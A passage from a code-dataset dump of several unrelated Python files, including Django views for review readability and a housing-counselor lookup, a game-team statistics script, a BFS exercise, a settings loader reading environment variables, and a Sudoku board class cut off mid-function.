\"\".join(bit_pattern)\n","repo_name":"CodeDrome/bacons-cipher-python","sub_path":"baconscipher.py","file_name":"baconscipher.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10492496462","text":"from django.shortcuts import render, redirect\nfrom django.http import JsonResponse\nfrom .models import UserReview, UserReviewNoIndicator, UserReview500char, RestModel\nimport re\nimport random\n\ndef index(request):\n if request.method == 'POST':\n\n\n token = request.POST.get(\"token\")\n star_rating = request.POST.get('star_rating')\n review_heading = request.POST.get('review_heading')\n review_box = request.POST.get('review_box')\n print(review_box)\n\n trimmed_review1 = re.sub(' +',' ',review_box)\n trimmed_review = re.sub(r'\\.+','.',trimmed_review1 )\n # array = review_box.split()\n # trimmed_review = \" \".join(array)\n print(trimmed_review)\n no_space = trimmed_review.replace(\" \", \"\")\n review_depth = len(no_space)\n\n print(token)\n print(type(token))\n\n if review_depth >0: \n \n #abcd bca cd ef\n\n #numWords = trimmed_review.count(\" \") + 1\n numWords = len(trimmed_review.split(' '))\n L = (review_depth/numWords)*100\n\n numSent = trimmed_review.count('.') + trimmed_review.count('!') + trimmed_review.count('?') \n if numSent==0:\n numSent = 1\n S = (numSent/numWords)*100\n \n cli = 0.0588 * L - 0.296 * S - 15.8\n ari = 4.71 *(review_depth/numWords) + 0.5 *(numWords/numSent) - 21.43\n avg = (cli + ari )/2\n \n\n\n print(\"depth \" + str(review_depth))\n print(\"Words \" + str(numWords))\n print(\"sent \" + str(numSent))\n print(\"L \" + str(L))\n print(\"S \" + str(S))\n print(\"cli \" + str(cli))\n print(\"ari \" + str(ari))\n print(\"avg \" + str(avg))\n \n\n prolific_id = request.POST.get('prolific_id')\n if token == \"1\":\n u = UserReview(review_heading=review_heading, review_box=review_box, star_rating=star_rating ,\n review_depth = review_depth, ari=ari, cli =cli, avg=avg, prolific_id=prolific_id)\n u.save()\n\n elif token == \"2\":\n u = UserReviewNoIndicator(review_heading=review_heading, review_box=review_box, star_rating=star_rating ,\n review_depth = review_depth, ari=ari, cli =cli, avg=avg, prolific_id=prolific_id)\n u.save()\n\n else : \n u = UserReview500char(review_heading=review_heading, review_box=review_box, star_rating=star_rating ,\n review_depth = review_depth, ari=ari, cli =cli, avg=avg, prolific_id=prolific_id)\n u.save()\n\n return redirect(exit)\n\n else:\n return render(request, 'newapp1/index.html')\n\n else:\n #num_list = [4, 5 , 6]\n #random_num = random.choice(num_list)\n #if random_num == 4: \n # return render(request, 'newapp1/index.html')\n #elif random_num == 5:\n # return render(request, 'newapp1/index-2.html')\n #else:\n # return render(request, 'newapp1/index500.html') \n\n count = RestModel.objects.get(key='visited')\n print(count.value)\n newCount = count.value + 1\n print(newCount)\n count.value = newCount #initial 0 finally 1\n print(count.value)\n count.save()\n\n\n if newCount%3 == 1: \n return render(request, 'newapp1/index.html')\n elif newCount%3 == 2:\n return render(request, 'newapp1/index-2.html')\n else:\n return render(request, 'newapp1/index500.html')\n \n\n\ndef exit(request):\n return render (request, 'newapp1/exit.html')\n\n\n\n\ndef returnIndices(request):\n if request.method == 'POST':\n trimmed_review = request.POST.get('review_box')\n\n no_space = trimmed_review.replace(\" \", \"\")\n review_depth = len(no_space)\n\n #numWords = len(re.findall(r'\\w+', trimmed_review))\n numWords = len(trimmed_review.split())\n L = (review_depth/numWords)*100\n\n numSent = trimmed_review.count('.') + trimmed_review.count('!') + trimmed_review.count('?') \n\n if numSent==0:\n numSent = 1 \n S = (numSent/numWords)*100\n \n cli = 0.0588 * L - 0.296 * S - 15.8\n ari = 4.71 * (L/100) + 0.5 * (100/S) - 21.43\n avg = (cli + ari )/2\n \n #print(trimmed_review)\n #print(\"depth \" + str(review_depth))\n #print(\"Words \" + str(numWords))\n #print(\"sent \" + str(numSent))\n #print(\"L \" + str(L))\n #print(\"S \" + str(S))\n #print(\"cli \" + str(cli))\n #print(\"ari \" + str(ari))\n #print(\"avg \" + str(avg))\n\n return JsonResponse({'depth': review_depth, 'cli': cli, 'ari': ari, 'avg': avg})","repo_name":"aishikamidder05/review-quality-iimb","sub_path":"newapp1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4767,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"11472380066","text":"# coding:utf-8\nimport glob\nimport json\nimport os\nfrom collections import defaultdict\nfrom multiprocessing import Manager, Process\n\nfrom .config import data_path, proc_pool_size, start_time\nfrom .db import get_pcr_team\n\nwith open(\"pcr/conf/ch.json\", \"r\", encoding=\"utf-8\") as f:\n d = json.load(f)\n main_tank = d[\"main_tank\"]\n other_list = d[\"other_list\"]\n all_ch_num = len(d[\"pos2ch_dic\"])\n\n\ndef get_ch_attend_and_win(pcr_team: list[tuple[str]]) -> dict[str, tuple[dict[str, str]]]:\n '''\n 统计1-4人组合出场率, 胜率\n :param pcr_team 数据库查询结果\n :return ch_attend_and_time 各组合的xy轴字典\n '''\n def backtrace(t_list: list[str], output_1: defaultdict[int],\n output_2: defaultdict[int], output_3: defaultdict[int],\n output_4: defaultdict[int], i=0, res=[]):\n '''\n 获取所有人物组合\n '''\n if len(res) >= 1:\n k = \"|\".join(res)\n if len(res) == 1:\n output_1[k] += 1\n elif len(res) == 2:\n output_2[k] += 1\n elif len(res) == 3:\n output_3[k] += 1\n else:\n output_4[k] += 1\n return\n for j in range(i, len(t_list)):\n backtrace(t_list, output_1, output_2, output_3,\n output_4, j + 1, res + [t_list[j]])\n\n team = set()\n # 出场次数\n ch_1_attend_time, ch_2_attend_time = defaultdict(int), defaultdict(int)\n ch_3_attend_time, ch_4_attend_time = defaultdict(int), defaultdict(int)\n # 胜利次数 失败次数\n ch_1_win_time, ch_1_lose_time = defaultdict(int), defaultdict(int)\n ch_2_win_time, ch_2_lose_time = defaultdict(int), defaultdict(int)\n ch_3_win_time, ch_3_lose_time = defaultdict(int), defaultdict(int)\n ch_4_win_time, ch_4_lose_time = defaultdict(int), defaultdict(int)\n for attack_team, defense_team, _, _ in pcr_team:\n # 统计进攻队\n if attack_team not in team:\n team.add(attack_team)\n backtrace(attack_team.split(\"|\"), ch_1_attend_time, ch_2_attend_time,\n ch_3_attend_time, ch_4_attend_time)\n backtrace(attack_team.split(\"|\"), ch_1_win_time,\n ch_2_win_time, ch_3_win_time, ch_4_win_time)\n # 统计防守队\n if defense_team not in team:\n team.add(defense_team)\n backtrace(defense_team.split(\"|\"), ch_1_attend_time, ch_2_attend_time,\n ch_3_attend_time, ch_4_attend_time)\n backtrace(defense_team.split(\"|\"), ch_1_lose_time,\n ch_2_lose_time, ch_3_lose_time, ch_4_lose_time)\n\n ch_attend_and_time = {\n \"1\": (ch_1_attend_time, ch_1_win_time, ch_1_lose_time),\n \"2\": (ch_2_attend_time, ch_2_win_time, ch_2_lose_time),\n \"3\": (ch_3_attend_time, ch_3_win_time, ch_3_lose_time),\n \"4\": (ch_4_attend_time, ch_4_win_time, ch_4_lose_time)\n }\n return ch_attend_and_time\n\n\ndef get_all_team(pcr_team: list[tuple[str]]):\n '''\n 获取我的所有pjjc阵容记录\n '''\n _main_tank, my_chlist = set(main_tank), set(main_tank + other_list)\n # 所有进攻角色、重复进攻角色、总好评、总差评\n all_team = defaultdict(lambda: ([set(), None, 0, 0]))\n for attack_team, defense_team, good_comment, bad_comment in pcr_team:\n d_sp = defense_team.split(\"|\")\n for ch in d_sp:\n if ch not in my_chlist or d_sp[-1] not in _main_tank:\n break\n else:\n a_sp = attack_team.split(\"|\")\n all_team[defense_team][0].update(a_sp)\n all_team[defense_team][1] = set(\n a_sp) if all_team[defense_team][1] is None else all_team[defense_team][1] & set(a_sp)\n all_team[defense_team][2] += good_comment\n all_team[defense_team][3] += bad_comment\n return all_team\n\n\ndef get_mypjjc_team(pcr_team: list[tuple[str]]):\n '''\n 获取我的pjjc所有阵容\n :param pcr_team 数据库查询结果\n :return data 我的所有阵容\n '''\n def backtrace(n: int, t_list: list[str], fd, i=0, res=[]):\n if len(res) == n:\n d = {r: all_team[r] for r in res}\n print(str(d), file=fd)\n return\n else:\n for j in range(i, len(t_list)):\n if res:\n # 去除重复角色\n for ch in t_list[j].split(\"|\"):\n if ch in \"|\".join(res):\n break\n else:\n backtrace(n, t_list, fd, j + 1, res + [t_list[j]])\n else:\n backtrace(n, t_list, fd, j + 1, res + [t_list[j]])\n\n def chunkify(filename: str, file_end: int, size=100*1024*1024):\n '''\n 分块切割文件\n :param filename 文件名\n :param file_end 文件游标尾\n :return 游标头 游标尾\n '''\n with open(filename, 'rb') as f:\n chunk_end = f.tell()\n while True:\n chunk_start = chunk_end\n f.seek(size, 1)\n f.readline()\n chunk_end = f.tell()\n yield chunk_start, chunk_end - chunk_start\n if chunk_end > file_end:\n break\n\n all_team = get_all_team(pcr_team)\n filename = os.path.join(data_path, \"data.txt\")\n with open(filename, \"w\") as f:\n backtrace(3, list(all_team.keys()), f)\n\n # 分块切割文件\n file_end = os.path.getsize(filename)\n with open(filename, \"rb\") as f:\n for index, (chunk_start, size) in enumerate(chunkify(filename, file_end)):\n f.seek(chunk_start)\n lines = f.read(size).splitlines()\n with open(os.path.join(data_path, \"data\" + str(index) + \".txt\"), \"w\") as f:\n for line in lines:\n print(line.decode(\"utf-8\"), file=f)\n\n\ndef get_bad_comment_rate(obj: list[list[str, int, int]]) -> float:\n '''\n 获取p场队伍总差评率\n :param obj p场队伍列表\n :return 差评率\n '''\n sum_gc_bc = obj[0][2] + obj[1][2] + \\\n obj[2][2] + obj[0][1] + obj[1][1] + obj[2][1]\n return ((obj[0][2] + obj[1][2] + obj[2][2]) / sum_gc_bc)\n\n\ndef analyze_team_process(filename_lst, res):\n '''\n 分析阵容进程\n :param filename_lst 文件名列表\n :param res 结果存放列表\n '''\n for filename in filename_lst:\n with open(filename, \"r\") as f:\n for p_team in f:\n p_team = eval(p_team)\n lst, s = [], None\n for defense_team, attack_team_data in p_team.items():\n if not attack_team_data[1]:\n break\n else:\n s = attack_team_data[1] if s is None else s & attack_team_data[1]\n if not s:\n break\n gc, bc = attack_team_data[2], attack_team_data[3]\n lst.append([defense_team, gc, bc])\n else:\n if s:\n res.append(lst)\n\n\ndef analyze_best_pjjc_team():\n '''\n 分析p场最优阵容\n '''\n # 生成参数列表\n data_path_lst = list(filter(lambda x: x != os.path.join(\n data_path, \"data.txt\"), glob.glob(data_path + \"/*.txt\")))\n params_lst = [[] for _ in range(proc_pool_size)]\n for i in range(len(data_path_lst)):\n params_lst[i % proc_pool_size].append(data_path_lst[i])\n\n res, p_list = Manager().list(), []\n for i in range(proc_pool_size):\n p = Process(target=analyze_team_process, args=(params_lst[i], res))\n p_list.append(p)\n for p in p_list:\n p.start()\n for p in p_list:\n p.join()\n\n # 按差评排序从小到大\n res.sort(key=get_bad_comment_rate, reverse=True)\n\n with open(\"pcr/res.txt\", \"w\") as f:\n for r in res:\n print(r, file=f)\n # print(\"%s\\t%s\\t%s\\t\" % (r[0][0].ljust(19), r[1][0].ljust(19), r[2][0]))\n\n\nif __name__ == \"__main__\":\n # 获取数据库所有数据\n pcr_team = get_pcr_team(start_time=start_time)\n\n # 获取我的pjjc所有阵容\n get_mypjjc_team(pcr_team)\n\n # 分析p场最优阵容\n analyze_best_pjjc_team()\n","repo_name":"635547251/pcr","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73403450666","text":"\"\"\" \n1. DFS\n- 음료수 얼려먹기, 유기농 배추, 바이러스, 달리기\n- 재귀 함수\n- 함수 모양 : 1. 범위\n- 격자 map이 있는 경우 -> for문을 돌리며 dfs 함수를 실행한다.\n- 격자 map이 없는 경우 (ex:네트워크) -> dfs 함수 내에서 for문을 돌린다.\n\n2. BFS\n- from collecitons import deque\n- while queue: 를 거의 사용\n- for i in range(4): -> 요 아래에서 알고리즘이 돌아가야함\n\n\"\"\" \n\nimport sys \nfrom collections import deque \nimport numpy as np \n\ndef bfs(x1, y1, x2, y2):\n queue = deque()\n queue.append((x1, y1))\n\n graph[x1][y1] = 0\n # visited[x1][y1] = True\n\n while queue:\n x, y = queue.popleft()\n\n if (x == x2) and (y == y2):\n return graph[x2][y2]\n for i in range(4):\n for j in range(1, k+1):\n nx = x + dx[i] * j\n ny = y + dy[i] * j\n \n # 범위 밖이면 다음 방향 탐색\n if nx < 0 or nx >=n or ny < 0 or ny >= m:\n break \n if graph[nx][ny] == '#':\n break \n if graph[nx][ny] == '.':\n print('here')\n queue.append((nx, ny))\n graph[nx][ny] = graph[x][y] + 1\n if graph[nx][ny] > graph[x][y]:\n continue\n else:\n break\n return -1\n\n\n\ninput = sys.stdin.readline\n# 세로, 가로, 1초에 이동가능한 최대 칸\nn, m, k = map(int, input().rstrip().split())\ngraph = [list(input().rstrip()) for _ in range(n)] # .split()을 x -> 입력된대로 list가 생성 \nvisited = [[False]*m for _ in range(n)]\nx1, y1, x2, y2 = map(int, input().split()) # space bar로 입력됨\n\nprint(np.array(graph))\nprint('x1, y1, x2, y2 : ', x1, y1, x2, y2)\n\ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\n\nprint(bfs(x1-1, y1-1, x2-1, y2-1))\nprint(np.array(graph))\n","repo_name":"cylanokim/Data_Analysis","sub_path":"python_Adv/달리기_bfs.py","file_name":"달리기_bfs.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13515384024","text":"import logging\nimport re\n\nfrom django.conf import settings\nfrom django.http import HttpResponseBadRequest\nfrom django.shortcuts import redirect\nfrom django.views.generic import TemplateView, View\n\nimport requests\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.util.retry import Retry\n\nfrom housing_counselor.forms import HousingCounselorForm\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef requests_retry_session(\n retries=3,\n backoff_factor=0.3,\n status_forcelist=(500, 502, 504),\n session=None,\n):\n session = session or requests.Session()\n retry = Retry(\n total=retries,\n read=retries,\n connect=retries,\n backoff_factor=backoff_factor,\n status_forcelist=status_forcelist,\n )\n adapter = HTTPAdapter(max_retries=retry)\n session.mount(\"http://\", adapter)\n session.mount(\"https://\", adapter)\n return session\n\n\nclass HousingCounselorS3URLMixin:\n @staticmethod\n def s3_url(file_format, zipcode):\n path = settings.HOUSING_COUNSELOR_S3_PATH_TEMPLATE.format(\n file_format=file_format, zipcode=zipcode\n )\n return path\n\n @classmethod\n def s3_json_url(cls, zipcode):\n return cls.s3_url(file_format=\"json\", zipcode=zipcode)\n\n @classmethod\n def s3_pdf_url(cls, zipcode):\n return cls.s3_url(file_format=\"pdf\", zipcode=zipcode)\n\n\nclass HousingCounselorView(TemplateView, HousingCounselorS3URLMixin):\n template_name = \"housing_counselor/index.html\"\n\n invalid_zip_msg = {\n \"error_message\": \"Sorry, you have entered an invalid ZIP code.\",\n \"error_help\": \"Please enter a valid five-digit ZIP code below.\",\n }\n\n failed_fetch_msg = {\n \"error_message\": \"Sorry, there was an error retrieving your results.\",\n \"error_help\": \"Please try again later.\",\n }\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"mapbox_access_token\"] = settings.MAPBOX_ACCESS_TOKEN\n\n zipcode = self.request.GET.get(\"zipcode\")\n context[\"zipcode\"] = zipcode\n\n if zipcode:\n zipcode_valid = re.match(r\"^\\d{5}$\", zipcode)\n\n if zipcode_valid:\n try:\n api_json = self.get_counselors(self.request, zipcode)\n except requests.HTTPError:\n context.update(self.invalid_zip_msg)\n except requests.exceptions.ConnectionError as err:\n logger.warning(err)\n context.update(self.failed_fetch_msg)\n else:\n context.update(\n {\n \"zipcode_valid\": True,\n \"api_json\": api_json,\n \"pdf_url\": self.s3_pdf_url(zipcode),\n }\n )\n else:\n context.update(self.invalid_zip_msg)\n\n return context\n\n @classmethod\n def get_counselors(cls, request, zipcode):\n \"\"\"Return list of housing counselors closest to a given zipcode.\n\n Raises requests.HTTPError on for nonexistent ZIP code.\n Raises requests.exceptions.ConnectionError for aborted connections.\n \"\"\"\n api_url = cls.s3_json_url(zipcode)\n\n response = requests_retry_session().get(api_url)\n response.raise_for_status()\n\n return response.json()\n\n\nclass HousingCounselorPDFView(View, HousingCounselorS3URLMixin):\n def get(self, request):\n form = HousingCounselorForm(request.GET)\n\n if not form.is_valid():\n return HttpResponseBadRequest(\"invalid zip code\")\n\n zipcode = form.cleaned_data[\"zip\"]\n return redirect(self.s3_pdf_url(zipcode))\n","repo_name":"cfpb/consumerfinance.gov","sub_path":"cfgov/housing_counselor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","stars":241,"dataset":"github-code","pt":"37"} +{"seq_id":"17411824814","text":"class Solution:\n # @param A : list of integers\n # @return an integer\n def solve(self, A):\n A.sort(reverse=False)\n for i in range(len(A)):\n if A[i] == len(A) - i - 1:\n c = 1\n break\n else:\n c = -1\n\n return c\n\n\nif __name__ == \"__main__\":\n A = [1, 2, 4, 8, 5, 6, 7]\n print(Solution().solve(A))\n","repo_name":"avirupdandapat/ALGOPROJECT","sub_path":"nobleinteger.py","file_name":"nobleinteger.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2548482772","text":"import os\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n# load cloud settings for defaults\nif os.environ.get('AMQP_PORT_5672_TCP') or os.environ.get('AMQP_HOST'):\n\tamqp_user = os.environ.get('AMQP_USER', 'guest')\n\tamqp_pass = os.environ.get('AMQP_PASSWORD', 'guest')\n\tamqp_ip = os.environ.get('AMQP_HOST', '127.0.0.1')\n\tamqp_ip = os.environ.get('AMQP_PORT_5672_TCP_ADDR', amqp_ip)\n\tamqp_port = os.environ.get('AMQP_PORT', '5672')\n\tamqp_port = os.environ.get('AMQP_PORT_5672_TCP_PORT', amqp_port)\n\tamqp_vhost = os.environ.get('AMQP_VHOST', '/')\n\tCELERY_BROKER = 'amqp://%s:%s@%s:%s/%s' % (\n\t\tamqp_user, amqp_pass, amqp_ip, amqp_port, amqp_vhost\n\t)\n\tlogger.info(\"Docker AMQP link detected, guessing %s\" % (CELERY_BROKER,))\n\n# detect docker links\nif os.environ.get('MEMCACHED_PORT_11211_TCP'):\n\tMEMCACHE_SERVERS = [\"%s:%s\" % (\n\t os.environ['MEMCACHED_PORT_11211_TCP_ADDR'],\n\t os.environ['MEMCACHED_PORT_11211_TCP_PORT']\n\t)]\n\tlogger.info(\"Docker Memcache link detected, guessing %s\" % (MEMCACHE_SERVERS,))\n\n# detect docker redis\nif os.environ.get('REDIS_PORT_6379_TCP_PORT'):\n\tREDIS_HOST = os.environ.get('REDIS_PORT_6379_TCP_ADDR', '127.0.0.1')\n\tlogger.info(\"Docker Redis link detected, guessing %s\" % (REDIS_HOST,))\n\n# detect openshift\nif os.environ.get('OPENSHIFT_MEMCACHED_HOST') and \\\n os.environ.get('OPENSHIFT_MEMCACHED_PORT'):\n\tMEMCACHE_SERVERS = [\"%s:%s\" % (\n\t os.environ['OPENSHIFT_MEMCACHED_HOST'],\n\t os.environ['OPENSHIFT_MEMCACHED_PORT']\n\t)]\n\tMEMCACHE_ARGS = {\n\t 'username': os.environ['OPENSHIFT_MEMCACHED_USERNAME'],\n\t 'password': os.environ['OPENSHIFT_MEMCACHED_PASSWORD']\n\t}\n\tlogger.info(\"Openshift Memcache link detected, guessing %s\" % (MEMCACHE_SERVERS,))\n\n# some fancy processing\nif os.environ.get('DATA_BACKGROUND'):\n\tif os.environ['DATA_BACKGROUND'].lower() in ['yes', 'true']:\n\t\tDATA_BACKGROUND = True\n\t\tlogger.info(\"Loading DATA_BACKGROUND from environ: %s\" % (DATA_BACKGROUND,))\n\tif os.environ['DATA_BACKGROUND'].lower() in ['no', 'false']:\n\t\tDATA_BACKGROUND = False\n\t\tlogger.info(\"Loading DATA_BACKGROUND from environ: %s\" % (DATA_BACKGROUND,))\nif os.environ.get('GAE_BASEURL'):\n\tBASE_URL = os.environ['GAE_BASEURL']\n\tlogger.info(\"Loading BASE_URL from GAE: %s\" % (BASE_URL,))\nif os.environ.get('MEMCACHE_SERVER'):\n\tMEMCACHE_SERVERS = [os.environ['MEMCACHE_SERVER']]\n\tlogger.info(\"Loading MEMCACHE_SERVER from environ: %s\" % (MEMCACHE_SERVERS[0],))\nif os.environ.get('MEMCACHE_SERVERS'):\n\tMEMCACHE_SERVERS = os.environ['MEMCACHE_SERVERS'].split(',')\n\tMEMCACHE_SERVERS = [s.strip() for s in MEMCACHE_SERVERS]\n\tlogger.info(\"Loading MEMCACHE_SERVERS from environ: %s\" % (MEMCACHE_SERVERS,))\n\n# make sure the memcache servers have ports\nif 'MEMCACHE_SERVERS' in globals():\n\tdef add_port(host, port):\n\t\tif ':' not in host:\n\t\t\treturn \"%s:%s\" % (host, port)\n\t\treturn host\n\tMEMCACHE_SERVERS = [add_port(s, '11211') for s in MEMCACHE_SERVERS]\n\n# try to load some keys from environment\nenv_keys = [\n 'BASE_URL',\n 'CELERY_BROKER', 'CELERY_RESULT_BACKEND', 'CELERY_CACHE_BACKEND',\n 'REDIS_HOST',\n 'AMAZON_ACCESS_KEY_ID', 'AMAZON_SECRET_ACCESS_KEY', 'AMAZON_ASSOCIATE_TAG',\n 'ITUNES_AFFILIATE_ID', 'ITUNES_TD_PROGRAM_ID', 'ITUNES_TD_WEBSITE_ID',\n 'DISCOGS_KEY', 'DISCOGS_SECRET', 'RDIO_KEY', 'RDIO_SECRET',\n 'SPOTIFY_ID', 'SPOTIFY_SECRET'\n]\nfor key in env_keys:\n\tif os.environ.get(key):\n\t\tglobals()[key] = os.environ[key]\n\t\tlogger.info(\"Loading %s from environ: %s\" % (key, os.environ[key]))\n\n# now autoload up some Celery configs\nif 'CELERY_BROKER' not in globals() and 'REDIS_HOST' in globals():\n\tCELERY_BROKER = 'redis://%s:6379/0' % (REDIS_HOST,)\n\nif 'CELERY_RESULT_BACKEND' not in globals() and 'REDIS_HOST' in globals():\n\tCELERY_RESULT_BACKEND = 'redis://%s:6379/0' % (REDIS_HOST,)\n\n# guess the final celery cache string based on the discovered MEMCACHE_SERVERS\nif 'CELERY_CACHE_BACKEND' not in globals() and 'MEMCACHE_SERVERS' in globals():\n\tCELERY_CACHE_BACKEND = 'memcached://%s/' % (';'.join(MEMCACHE_SERVERS), )\n\tlogger.info(\"Guessing Celery cache backend at: %s\" % (CELERY_CACHE_BACKEND,))\n","repo_name":"hufman/vgmdb","sub_path":"vgmdb/autoload_settings.py","file_name":"autoload_settings.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"37"} +{"seq_id":"13243516482","text":"\"\"\"\nA Sudoku board holds a matrix of tiles.\nEach row and column and also sub-blocks\nare treated as a group (sometimes called\na 'nonet'); when solved, each group must contain\nexactly one occurrence of each of the\nsymbol choices.\n\"\"\"\nfrom sdk_config import CHOICES, UNKNOWN, ROOT # choices = #, unknown = ., root = num rows in box\nfrom sdk_config import NROWS, NCOLS # nrows = total rows, ncols = total cols\nimport enum\nfrom typing import Sequence, List, Set\n\nimport logging\nlogging.basicConfig()\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG) # log.setLevel(logging.INFO)\n\n\n\n# --------------------------------\n# The events for MVC\n# --------------------------------\n\nclass Event(object):\n \"\"\"Abstract base class of all events, both for MVC\n and for other purposes.\n \"\"\"\n pass\n# --------------------------------------\n# Events and listeners for Tile objects\n# --------------------------------------\n\nclass EventKind(enum.Enum):\n TileChanged = 1\n TileGuessed = 2\n\n\nclass TileEvent(Event):\n \"\"\"Abstract base class for things that happen\n to tiles. We always indicate the tile. Concrete\n subclasses indicate the nature of the event.\n \"\"\"\n\n def __init__(self, tile: 'Tile', kind: EventKind):\n self.tile = tile\n self.kind = kind\n # Note 'Tile' type is a forward reference;\n # Tile class is defined below\n\n def __str__(self):\n \"\"\"Printed representation includes name of concrete subclass\"\"\"\n return f\"{repr(self.tile)}\"\n\n# ---------------\n# Listeners and Listenable (base class)\n# ---------------\n\nclass Listener(object):\n \"\"\"Abstract base class for listeners.\n Subclass this to make the notification do\n something useful.\n \"\"\"\n\n def __init__(self):\n \"\"\"Default constructor for simple listeners without state\"\"\"\n pass\n\n def notify(self, event: Event):\n \"\"\"The 'notify' method of the base class must be\n overridden in concrete classes.\n \"\"\"\n raise NotImplementedError(\"You must override Listener.notify\")\n\n\nclass Listenable:\n \"\"\"Objects to which listeners (like a view component) can be attached\"\"\"\n\n def __init__(self):\n self.listeners = [ ]\n\n def add_listener(self, listener: Listener):\n self.listeners.append(listener)\n\n def notify_all(self, event: Event):\n for listener in self.listeners:\n listener.notify(event)\n\n\nclass TileListener(Listener):\n def notify(self, event: TileEvent):\n raise NotImplementedError(\n \"TileListener subclass needs to override notify(TileEvent)\")\n\n# ----------------------------------------------\n# Tile class\n# ----------------------------------------------\n\n\nclass Tile(Listenable):\n \"\"\"One tile on the Sudoku grid.\n Public attributes (read-only): value, which will be either\n UNKNOWN or an element of CHOICES; candidates, which will\n be a set drawn from CHOICES. If value is an element of\n CHOICES,then candidates will be the singleton containing\n value. If candidates is empty, then no tile value can\n be consistent with other tile values in the grid.\n value is a public read-only attribute; change it\n only through the access method set_value or indirectly\n through method remove_candidates.\n \"\"\"\n\n def __init__(self, row: int, col: int, value=UNKNOWN):\n super().__init__()\n assert value == UNKNOWN or value in CHOICES\n self.row = row\n self.col = col\n self.set_value(value)\n\n def set_value(self, value: str):\n if value in CHOICES:\n self.value = value\n self.candidates = {value}\n else:\n self.value = UNKNOWN\n self.candidates = set(CHOICES)\n self.notify_all(TileEvent(self, EventKind.TileChanged))\n\n def __str__(self) -> str:\n return f\"{self.value}\"\n\n def __repr__(self) -> str:\n return f\"Tile({self.row}, {self.col}, '{self.value}')\"\n\n def could_be(self, value: str) -> bool:\n \"\"\"True iff value is a candidate value for this tile\"\"\"\n return value in self.candidates\n\n def __hash__(self) -> int:\n \"\"\"Hash on position only (not value)\"\"\"\n return hash((self.row, self.col))\n\n def remove_candidates(self, used_values: Set[str]) -> bool:\n \"\"\"The used values cannot be a value of this unknown tile.\n We remove those possibilities from the list of candidates.\n If there is exactly one candidate left, we set the\n value of the tile.\n Returns: True means we eliminated at least one candidate,\n False means nothing changed (none of the 'used_values' was\n in our candidates set).\n \"\"\"\n new_candidates = self.candidates.difference(used_values)\n if new_candidates == self.candidates:\n # Didn't remove any candidates\n return False\n self.candidates = new_candidates\n if len(self.candidates) == 1:\n self.set_value(new_candidates.pop())\n self.notify_all(TileEvent(self, EventKind.TileChanged))\n return True\n\n# ------------------------------\n# Board class\n# ------------------------------\n\nclass Board(object):\n \"\"\"A board has a matrix of tiles\"\"\"\n\n def __init__(self):\n \"\"\"The empty board\"\"\"\n # Row/Column structure: Each row contains columns\n self.tiles: List[List[Tile]] = [ ]\n for row in range(NROWS):\n cols = []\n for col in range(NCOLS):\n cols.append(Tile(row, col))\n self.tiles.append(cols)\n self.groups = []\n\n for row in self.tiles:\n self.groups.append(row)\n\n for col in range(len(self.tiles)):\n new_str = []\n for row in self.tiles:\n new_str.append(row[col])\n self.groups.append(new_str)\n\n for block_row in range(ROOT):\n for block_col in range(ROOT):\n group = []\n for row in range(ROOT):\n for col in range(ROOT):\n row_addr = (ROOT * block_row) + row\n col_addr = (ROOT * block_col) + col\n group.append(self.tiles[row_addr][col_addr])\n self.groups.append(group)\n\n def set_tiles(self, tile_values: Sequence[Sequence[str]] ):\n \"\"\"Set the tile values a list of lists or a list of strings\"\"\"\n for row_num in range(NROWS):\n for col_num in range(NCOLS):\n tile = self.tiles[row_num][col_num]\n tile.set_value(tile_values[row_num][col_num])\n\n def __str__(self) -> str:\n \"\"\"In Sadman Sudoku format\"\"\"\n row_syms = []\n for row in self.tiles:\n values = [tile.value for tile in row]\n row_syms.append(\"\".join(values))\n return \"\\n\".join(row_syms)\n\n def is_consistent(self) -> bool:\n \"\"\"for each group (row, column, or block):\n used symbols = { }\n for each tile in the group:\n if the tile is one of CHOICES (anything but UNKNOWN):\n if the tile's symbol is already in used symbols:\n return False (board is not consistent)\n else:\n add the tile's symbol to the used symbols\n return True (the solved part of the board is ok so far)\n \"\"\"\n for group in self.groups:\n used_symbols = {}\n for tile in group:\n if str(tile) in CHOICES:\n if int(tile.value) in used_symbols:\n return False\n else:\n used_symbols[int(tile.value)] = int(tile.value)\n return True\n\n def naked_single(self) -> bool:\n \"\"\"Eliminate candidates and check for sole remaining possibilities.\n Return value True means we crossed off at least one candidate.\n Return value False means we made no progress.\n \"\"\"\n value = False\n for group in self.groups:\n used_symbols = {}\n for tile in group:\n if str(tile) in CHOICES:\n if int(tile.value) not in used_symbols:\n used_symbols[int(tile.value)] = int(tile.value)\n for tile in group:\n if str(tile) not in CHOICES:\n change = Tile.remove_candidates(tile, set(str(used_symbols)))\n if change is True:\n value = True\n return value\n\n def hidden_single(self) -> bool:\n \"\"\"for each group of tiles:\n leftovers = copy of CHOICES\n for each tile in group:\n if tile.value in CHOICES, remove it from leftovers\n for each value in leftovers:\n count the number of tiles for which value is a candidate.\n If the number is 1, then put the value in that tile. \"\"\"\n choice = False\n for group in self.groups:\n leftovers = set(CHOICES)\n for tile in group:\n if tile.value in CHOICES:\n leftovers.discard(tile.value)\n for value in leftovers:\n count = 0\n for tile in group:\n if tile.value not in CHOICES:\n if value in tile.candidates:\n count += 1\n target_tile = tile\n if count > 1:\n break\n if count == 1:\n 